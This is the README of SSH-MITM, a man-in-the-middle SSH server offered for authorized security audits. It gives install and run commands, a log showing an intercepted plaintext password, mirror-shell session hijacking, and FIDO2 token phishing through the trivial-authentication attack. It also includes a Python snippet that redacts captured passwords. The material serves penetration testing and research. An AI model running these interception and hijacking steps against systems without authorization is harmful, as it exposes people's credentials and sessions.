ssh man-in-the-middle (ssh-mitm) server for security audits supporting
publickey authentication, session hijacking and file manipulation
Legal notice: SSH-MITM is intended for authorized security audits, penetration testing, and research only. Do not use it against systems you do not own or have explicit written permission to test. Unauthorized interception of SSH traffic may be illegal in your jurisdiction.
```bash
wget https://github.com/ssh-mitm/ssh-mitm/releases/latest/download/ssh-mitm-x86_64.AppImage
chmod +x ssh-mitm-x86_64.AppImage
./ssh-mitm-x86_64.AppImage server --remote-host <target-host>
```

For other installation options (pip, Flatpak, Snap) see the Installation section below.
- Introduction
- Use Cases
- Features
- Installation
- Quickstart
- Session hijacking
- Phishing FIDO Tokens
- Contributing
- Contact
SSH-MITM is a man-in-the-middle SSH server for security audits and malware analysis.
Password and publickey authentication are supported. SSH-MITM can detect if a user is able to log in with publickey authentication on the remote server, allowing it to accept the same key as the destination server. If publickey authentication is not possible, it falls back to password authentication.
When publickey authentication is possible, a forwarded agent is needed to log in to the remote server. If no agent is forwarded, SSH-MITM can redirect the session to a honeypot.
- Penetration testing — audit SSH clients and servers in authorized engagements
- Security research — analyze SSH client behavior and authentication flows
- Training environments — demonstrate MITM attacks in controlled lab setups
- Malware analysis — inspect SSH traffic from suspicious clients in isolated environments
| Feature | Description |
|---|---|
| Publickey authentication | Accepts the same key as the destination server; detects and falls back to password auth |
| FIDO2 token phishing | Intercepts hardware token authentication via the trivial authentication attack (OpenSSH info) |
| Session hijacking | Mirror and interact with live SSH sessions in real time |
| File interception | Store and replace files during SCP/SFTP transfers |
| Port forwarding | TCP and dynamic forwarding with SOCKS 4/5 support |
| MOSH interception | Intercept MOSH connections |
| Client auditing | Check connecting clients against known vulnerabilities |
| Plugin support | Extend functionality with custom plugins |
- Linux (x86_64)
- Python 3.11 or newer (for pip installation)
No installation required — just download and run:
```bash
wget https://github.com/ssh-mitm/ssh-mitm/releases/latest/download/ssh-mitm-x86_64.AppImage
chmod +x ssh-mitm-x86_64.AppImage
```

Flatpak:

```bash
flatpak install flathub at.ssh_mitm.server
flatpak run at.ssh_mitm.server
```

Snap:

```bash
sudo snap install ssh-mitm
```

pip:

```bash
pip install "ssh-mitm[production]"
```

For more details, see the SSH-MITM installation guide.
Start SSH-MITM and point it at your target host (replace <target-host> with the SSH server you want to audit):
```bash
ssh-mitm server --remote-host <target-host>
```
SSH-MITM listens on port 10022 by default. Connect through the proxy:
```bash
ssh -p 10022 testuser@proxyserver
```
You will see the intercepted credentials in the log output:
```text
INFO Remote authentication succeeded
Remote Address: 127.0.0.1:22
Username: testuser
Password: secret
Agent: no agent
```
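When this log output goes into an audit report, the plaintext passwords should not travel with it. The following Python code is an added example, not part of the SSH-MITM project: it parses records in the layout shown above, reports who authenticated and how, and redacts the password values. The function names, the second sample record, and treating any `Agent` value other than `no agent` as a forwarded agent are assumptions.

```python
import re

# Constructed sample in the layout of the Quickstart log output above;
# the second record and the non-record line are made up for illustration.
SAMPLE_LOG = """\
INFO Remote authentication succeeded
    Remote Address: 127.0.0.1:22
    Username: testuser
    Password: secret
    Agent: no agent
INFO created mirrorshell on port 34463
INFO Remote authentication succeeded
    Remote Address: 127.0.0.1:22
    Username: backup
    Password: hunter2
    Agent: no agent
"""

HEADER = "Remote authentication succeeded"
FIELD = re.compile(r"^\s*(Remote Address|Username|Password|Agent):\s*(.*)$")

def parse_auth_records(text):
    """Group the 'Key: value' lines that follow each success header."""
    records, current = [], None
    for line in text.splitlines():
        match = FIELD.match(line)
        if HEADER in line:
            current = {}
            records.append(current)
        elif match and current is not None:
            current[match.group(1)] = match.group(2).strip()
        elif not match:
            current = None  # any other log line closes the open record
    return records

def findings(records):
    """Report who authenticated and how, without copying the secret."""
    return [{
        "username": r.get("Username", "<unknown>"),
        "remote": r.get("Remote Address", "<unknown>"),
        "password_captured": "Password" in r,
        # Assumption: any value other than "no agent" means an agent was forwarded.
        "agent_forwarded": r.get("Agent", "no agent") != "no agent",
    } for r in records]

def redact_log(text):
    """Blank out Password values in the raw log, keeping its layout."""
    return re.sub(r"^([ \t]*Password:[ \t]*).*$", r"\1<redacted>", text, flags=re.M)
```

Run `redact_log` over the log file before archiving it, and use `findings` for the per-account summary in the report.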
When a client connects, SSH-MITM starts a mirror shell that can be used for session hijacking:
```text
INFO ℹ created mirrorshell on port 34463. connect with: ssh -p 34463 127.0.0.1
```
Connect to the mirror shell with any SSH client:
```bash
ssh -p 34463 127.0.0.1
```
Commands executed in either the original or the hijacked session will be visible in both.
SSH-MITM is able to phish FIDO2 tokens which can be used for two-factor authentication.
The attack is called trivial authentication (CVE-2021-36367, CVE-2021-36368) and can be enabled with the command line argument --enable-trivial-auth:
```bash
ssh-mitm server --enable-trivial-auth
```
The attack is only performed when publickey login is possible, so password authentication continues to work normally.
Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
- Fork the Project
- Create your Feature Branch (`git checkout -b feature/AmazingFeature`)
- Commit your Changes (`git commit -m 'Add some AmazingFeature'`)
- Push to the Branch (`git push origin feature/AmazingFeature`)
- Open a Pull Request
- E-Mail: support@ssh-mitm.at
- Issue Tracker

